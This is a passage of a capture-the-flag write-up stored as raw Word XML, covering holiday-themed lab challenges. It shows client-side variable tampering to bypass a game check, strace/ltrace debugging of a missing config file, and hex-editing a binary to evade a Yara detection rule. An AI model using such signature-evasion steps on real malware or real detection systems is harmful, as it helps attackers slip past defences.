        <w:t>Upon loading the game, I opened the developer tools console to begin seeing what kind of client side values may exist. There is a “HOHOHO” cookie with the default value “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>%7B%22single_player%22%3Afalse%7D</w:t>
      </w:r>
      <w:r>
        <w:t>” which I changed from false to true. This does not have any immediate impact on the ability to play in single player mode, however.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28351130" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1230"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I did attempt to look at the game through Burp Proxy. By modifying certain variables in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> communication, I did succeed in getting the player 2 console activated. I was able to play the game locally as both player 1 and player 2, but despite getting a high enough score, the game would fail to successfully validate the score and complete the challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E12240" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1230"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I needed to understand more about the variables available. The code for the game can be found in </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>holidayhero.min.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. It contains several interesting variables, including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>single_player_mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EBB37C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1230"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>I found that by changing the value of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>single_player_mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to “1” in the developer tools console, it is possible to play a single player game. In this mode, the computer will substitute for player two and allow the player to successfully refuel the sleigh and complete the challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E518BC4" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1230"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9E8D27" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Log4Jack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3699E756" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>These are more interactive tutorials than challenges. They’re important and worthwhile for anyone who hasn’t had experience with Log4Jack or benefit from interactive/hands-on learning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494CA3BC" w14:textId="77777777" w:rsidR="0094724D" w:rsidRPr="00307498" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="1C66FC10" w14:textId="67F151BF" w:rsidR="00307498" w:rsidRDefault="00307498" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Logic Munchers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9EBC6" w14:textId="58049458" w:rsidR="00307498" w:rsidRDefault="00307498" w:rsidP="00307498">
      <w:r>
        <w:t xml:space="preserve">To beat this challenge, you have to play Logic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chompers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on Intermediate on Potpourri mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBCA5C" w14:textId="7A88715D" w:rsidR="00307498" w:rsidRDefault="00307498" w:rsidP="00307498">
      <w:r>
        <w:t>This board is populated with Boolean logic, arithmetic expressions, number conversions, and bitwise operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71EC6D" w14:textId="234EDC40" w:rsidR="00307498" w:rsidRDefault="00307498" w:rsidP="00307498">
      <w:r>
        <w:t>I do not have any special or unique insight into a solution for this challenge, other than to review and learn the logic until you understand enough to pass the challenge. You can probably loosely learn the patterns and make some pretty good guesses in short time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298CBDAD" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Retrace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1755675F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">To solve this challenge, we need to determine why the cotton candy machine will not run after an SD card was replaced. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B72F7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">By running the file against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can diagnose and resolve the issue plaguing the cotton candy machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F264433" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="6A132387" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">kotton_kandy_co@b5d548c5257c:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>make_the_candy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46EB6C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>registration.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "r")                           = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC29853" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>puts("Unable to open configuration fil"...Unable to open configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A9F5D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>)               = 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA08C41" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>+++ exited (status 1) +++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B6C489" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="0094724D"/>
    <w:p w14:paraId="33314872" w14:textId="3DBA5760" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">To resolve this, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>registration.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should exist. Run “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">touch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>registration.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to create the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B5050D" w14:textId="73DF977A" w:rsidR="0094724D" w:rsidRPr="00342C83" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After checking again with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, I determined the file might need data in i</w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>. Run “</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">echo junk &gt;&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>registration.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00342C83" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F69B6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>ltrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, the application was looking for Registration but found junk. Change the file to include “Registration” with a text editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7487B" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>Next, it appears that it is looking for a colon after registration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D5ACF" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A1D9F2" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D045698" w14:textId="28E7A496" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("Registration\n", "Registration")               = "Registration\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B031A" w14:textId="3132EF62" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strchr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("Registration\n", ':')                          = nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A164D9C" w14:textId="26A8C638" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32B5EA" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="5079B80F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>After changing the file to “Registration :” and running again, we get the following snippet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F34CCB" w14:textId="113930E6" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6897006C" w14:textId="33C92092" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("Registration :\n", "Registration")             = "Registration :\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F81B6F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strchr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("Registration :\n", ':')                        = ":\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60412FE3" w14:textId="7FB073C4" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(":\n", "True")                                  = nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5623B6" w14:textId="4F415206" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD70B01" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="37CE02A6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t xml:space="preserve">Update </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>registration.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to “Registration : True” via a text editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7548799C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D">
      <w:r>
        <w:t>The application now runs without error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E57AB" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="0094724D"/>
    <w:p w14:paraId="64DE0325" w14:textId="1F510337" w:rsidR="00A54818" w:rsidRDefault="001C2E9D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Yara Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F515F3" w14:textId="2DCFC347" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00A54818">
      <w:r>
        <w:t xml:space="preserve">In this challenge, we have to modify an executable to make it evade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rules. </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sounds Frosty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844060F" w14:textId="0408EBC8" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00A54818">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">First, running the app will fail and the specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rule encountered will be displayed. We can find the rules by grepping the file and getting the lines after the rule title.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603A7D62" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">snowball2@467f4030cc95:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the_critical_elf_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EE9101D" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yara_rule_135 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the_critical_elf_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E1BF783" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F3214C" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>snowball2@467f4030cc95:~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yara_rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ grep "yara_rule_135 {" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rules.yar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4751501A" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>rule yara_rule_135 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157ADA14" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   meta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CE292" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      description = "binaries - file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sugar_in_the_machinery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CC271" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      author = "Sparkle Redberry"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C6D39" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      reference = "North Pole Malware Research Lab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33170D6F" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      date = "1955-04-21"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B1A1E" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      hash = "19ecaadb2159b566c39c999b0f860b4d8fc2824eb648e275f57a6dbceaf9b488"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D5AC9E" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BFA53" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>candycane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEFC39" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEE7C7" w14:textId="77777777" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      $s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A1386" w14:textId="7E0C6196" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08A69D" w14:textId="32EC96E6" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="001C2E9D"/>
    <w:p w14:paraId="3965C26F" w14:textId="5F884170" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="001C2E9D">
      <w:r>
        <w:t xml:space="preserve">The first step is to remove the string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>candycane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the file, while not modifying it in a way that impacts its ability to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09433DE2" w14:textId="68F3D24A" w:rsidR="001C2E9D" w:rsidRDefault="001C2E9D" w:rsidP="001C2E9D">
      <w:r>
        <w:t xml:space="preserve">To do so, I opened the file with </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, used the following command to convert the output to hex </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(:%! </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>Xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), changed ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>candycane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ to ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>candycxxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ by changing the values for ‘a’ and ‘n’ to 78 for ‘x’. I reverted the changes with (</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:%! </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>Xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r</w:t>
      </w:r>
      <w:r>
        <w:t>) then saved the document (</w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>wq</w:t>
      </w:r>
